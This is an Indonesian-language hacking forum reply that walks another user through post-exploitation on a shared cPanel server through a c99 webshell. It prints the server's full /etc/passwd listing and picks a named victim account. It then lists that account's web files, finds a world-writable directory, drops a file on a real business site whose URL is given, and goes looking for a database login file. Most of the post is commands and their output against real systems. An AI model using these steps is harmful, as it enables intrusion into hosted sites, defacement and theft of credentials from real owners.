abit doang wrote:klo model shell ku ini gimana..??
udah mati kutu kayaknya ...
permision 755, kagak ada file penting pula,..
mo UP juga gak bisa,..
atau masih bisa digoyang.???
Masih sangat bisa koq Om:
Modal kita saat ini:
Webshell:
c99
Path Web Direktori:
/home/<user>/public_html
Dari kedua modal di atas kita bisa mencari informasi lokasi yg bisa ditulisi maupun mencari info login ke database, berikut langkah2 yg bisa sy lakukan:
1. Lihat isi /etc/passwd
ketikkan ini pada Bag. Command Execution:
cat /etc/passwd
Selanjutnya akan ditampilkan daftar user yg ada pada sistem.
Code: Select all
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
loansnow:x:512:512::/home/loansnow:/bin/bash
jk:x:32007:32009::/home/jk:/bin/bash
murrland:x:513:513::/home/murrland:/bin/bash
murrclas:x:514:514::/home/murrclas:/bin/bash
wwwinre:x:515:515::/home/wwwinre:/bin/bash
wwwcoor:x:516:516::/home/wwwcoor:/bin/bash
magpie:x:517:517::/home/magpie:/bin/bash
wwwbbc:x:518:518::/home/wwwbbc:/bin/bash
wwwtaa:x:519:519::/home/wwwtaa:/bin/bash
wwwremfi:x:520:520::/home/wwwremfi:/bin/bash
murrcom:x:521:521::/home/murrcom:/bin/bash
wwwclic:x:522:522::/home/wwwclic:/bin/bash
wwwsesa:x:523:523::/home/wwwsesa:/bin/bash
wwwscsa:x:524:524::/home/wwwscsa:/bin/bash
wwwbb:x:525:525::/home/wwwbb:/bin/bash
wwwbv:x:526:526::/home/wwwbv:/bin/bash
westate:x:528:528::/home/westate:/usr/local/cpanel/bin/jailshell
djautos:x:529:529::/home/djautos:/usr/local/cpanel/bin/jailshell
raptchau:x:530:530::/home/raptchau:/bin/bash
wwwweb:x:531:531::/home/wwwweb:/bin/bash
supasorb:x:532:532::/home/supasorb:/bin/bash
yoshiki:x:533:533::/home/yoshiki:/bin/bash
bcampers:x:534:534::/home/bcampers:/bin/bash
wwwposi:x:535:535::/home/wwwposi:/usr/local/cpanel/bin/noshell
wwwbsre:x:536:536::/home/wwwbsre:/usr/local/cpanel/bin/noshell
wwwmjf:x:537:537::/home/wwwmjf:/bin/bash
wwwblue:x:538:538::/home/wwwblue:/usr/local/cpanel/bin/noshell
wwwace4:x:539:539::/home/wwwace4:/usr/local/cpanel/bin/noshell
wwwaloa:x:540:540::/home/wwwaloa:/usr/local/cpanel/bin/noshell
wwwmorg:x:541:541::/home/wwwmorg:/usr/local/cpanel/bin/noshell
wwwfair:x:542:542::/home/wwwfair:/usr/local/cpanel/bin/noshell
themurrl:x:543:543::/home/themurrl:/bin/bash
wwwrich:x:544:544::/home/wwwrich:/bin/bash
raok:x:545:545::/home/raok:/usr/local/cpanel/bin/noshell
wwwstyl:x:546:546::/home/wwwstyl:/usr/local/cpanel/bin/noshell
wwwsama:x:547:547::/home/wwwsama:/usr/local/cpanel/bin/noshell
wwwwater:x:548:548::/home/wwwwater:/bin/bash
wwwmill:x:549:549::/home/wwwmill:/bin/bash
wwwbcam:x:550:550::/home/wwwbcam:/bin/bash
hillssa:x:551:551::/home/hillssa:/bin/bash
wwwaldi:x:552:552::/home/wwwaldi:/bin/bash
propoly:x:553:553::/home/propoly:/bin/bash
mwl33577:x:554:554::/home/mwl33577:/usr/local/cpanel/bin/jailshell
wwwcindy:x:555:555::/home/wwwcindy:/bin/bash
wwwharr:x:556:556::/home/wwwharr:/bin/bash
wwwsaski:x:557:557::/home/wwwsaski:/bin/bash
hartmann:x:558:558::/home/hartmann:/bin/bash
miniminy:x:559:559::/home/miniminy:/bin/bash
wwwurban:x:560:560::/home/wwwurban:/bin/bash
ehmpcg:x:561:561::/home/ehmpcg:/bin/bash
wwwincon:x:562:562::/home/wwwincon:/bin/bash
wwwgecr:x:563:563::/home/wwwgecr:/bin/bash
wwwholb:x:564:564::/home/wwwholb:/bin/bash
murray:x:565:565::/home/murray:/usr/local/cpanel/bin/jailshell
masonsre:x:566:566::/home/masonsre:/usr/local/cpanel/bin/jailshell
wwwdogs:x:567:567::/home/wwwdogs:/bin/bash
mbbook:x:568:568::/home/mbbook:/bin/bash
blondies:x:569:569::/home/blondies:/bin/bash
wwwmach:x:570:570::/home/wwwmach:/bin/bash
polarpri:x:571:571::/home/polarpri:/usr/local/cpanel/bin/noshell
polardis:x:573:573::/home/polardis:/bin/bash
mclascom:x:503:500::/home/mclascom:/bin/bash
polar2:x:504:501::/home/polar2:/bin/bash
wwwcool:x:505:502::/home/wwwcool:/bin/bash
murraybr:x:506:503::/home/murraybr:/bin/bash
mbmotel:x:507:504::/home/mbmotel:/bin/bash
wwwridl:x:508:505::/home/wwwridl:/bin/bash
spirit09:x:509:506::/home/spirit09:/bin/bash
mbunited:x:574:507::/home/mbunited:/bin/bash
aungerre:x:575:508::/home/aungerre:/bin/bash
bexhaust:x:576:509::/home/bexhaust:/bin/bash
taylored:x:577:574::/home/taylored:/bin/bash
wwwzen:x:578:575::/home/wwwzen:/bin/bash
mbmerc:x:579:576::/home/mbmerc:/bin/bash
wwwroof:x:580:577::/home/wwwroof:/bin/bash
wwwopen:x:581:578::/home/wwwopen:/bin/bash
leadinge:x:582:579::/home/leadinge:/bin/bash
wwwpure:x:583:580::/home/wwwpure:/bin/bash
wwwspend:x:584:581::/home/wwwspend:/bin/bash
mbplay:x:585:582::/home/mbplay:/bin/bash
wwwlej:x:586:583::/home/wwwlej:/bin/bash
wwwtoto:x:587:584::/home/wwwtoto:/bin/bash
wwwmbweb:x:588:585::/home/wwwmbweb:/bin/bash
wwwdab:x:589:586::/home/wwwdab:/bin/bash
polar3:x:590:587::/home/polar3:/bin/bash
wwwprint:x:591:588::/home/wwwprint:/bin/bash
wwwmbmc:x:592:589::/home/wwwmbmc:/bin/bash
mbinvest:x:593:590::/home/mbinvest:/bin/bash
Target sy kali ini adalah user bernama
hartmann
2. Dari info user yg telah kita dapatkan, kita bisa mencoba masuk ke lokasi webdir masing2 user.
ls -l /home/hartmann/public_html
Result:
Code: Select all
total 2072
-rw-r--r-- 1 hartmann hartmann 8327 Nov 21 2009 AC_RunActiveContent.js
drwxr-xr-x 2 hartmann hartmann 4096 Sep 25 2009 admin
drwxr-xr-x 2 hartmann hartmann 4096 Sep 10 2009 cgi-bin
-rw-r--r-- 1 hartmann hartmann 12763 Nov 23 2009 contactus.htm
drwxr-xr-x 3 hartmann hartmann 4096 Sep 24 2009 css
-rw-r--r-- 1 hartmann hartmann 7760 Sep 24 2009 gallery.htm
drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06 galleryimages
-rw-r--r-- 1 hartmann hartmann 9319 Nov 21 2009 gallery.php
-rw-r--r-- 1 hartmann hartmann 43815 Nov 21 2009 hartwhite.swf
-rw-r--r-- 1 hartmann hartmann 24155 Nov 23 2009 home.htm
drwxr-xr-x 3 hartmann hartmann 4096 Nov 21 2009 images
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009 include
-rw-r--r-- 1 hartmann hartmann 4470 Oct 27 2009 meetthestaff.htm
drwxr-xr-x 4 hartmann hartmann 4096 Sep 15 2009 _mm
drwxr-xr-x 2 hartmann hartmann 4096 Nov 23 2009 _notes
-rw-r--r-- 1 hartmann hartmann 132 Sep 15 2009 robots.txt
-rw-r--r-- 1 hartmann hartmann 6629 Nov 23 2009 services.htm
-rw-r--r-- 1 hartmann hartmann 8949 Nov 21 2009 Southcoast.htm
-rw-r--r-- 1 hartmann hartmann 1931680 Oct 23 2009 swflash.cab
3. Mencari lokasi yg bisa ditulisi:
Dari daftar file dan dir yg telah ditampilkan di atas, terdapat 1 lokasi yg bisa kita tulisi, yaitu:
drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06
galleryimages
Kita bisa langsung menuju ke lokasi tsb, lalu mengunggah atau membuat file milik kita.
Hasilnya:
http://hartmannplumbing.com.au/galleryi ... 3m3b0y.txt
4. Hal lain yg bisa kita lakukan adalah mencari info koneksi ke database.
Mata sy tertuju ke Direktori:
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009
include
Saya kemudian masuk ke lokasi tsb dan menemukan file2 menarik:
Code: Select all
total 172
-rw-r--r-- 1 hartmann hartmann 1870 Sep 24 2009 dbfunctions.inc
-rw-r--r-- 1 hartmann hartmann 4968 Sep 24 2009 functions.inc
-rw-r--r-- 1 hartmann hartmann 4014 Sep 15 2009 gallery.css
-rw-r--r-- 1 hartmann hartmann 11630 Sep 15 2009 gallery.js
-rw-r--r-- 1 hartmann hartmann 120620 Sep 15 2009 jquery.js
-rw-r--r-- 1 hartmann hartmann 106 Sep 24 2009 logins.inc
-rw-r--r-- 1 hartmann hartmann 4021 Sep 15 2009 thickbox.css
-rw-r--r-- 1 hartmann hartmann 11629 Sep 15 2009 thickbox.js
Selanjutnya sy coba buka isi file
logins.inc
Hasilnya:
Cek sj sendiri ahh...
Ok, that's all folks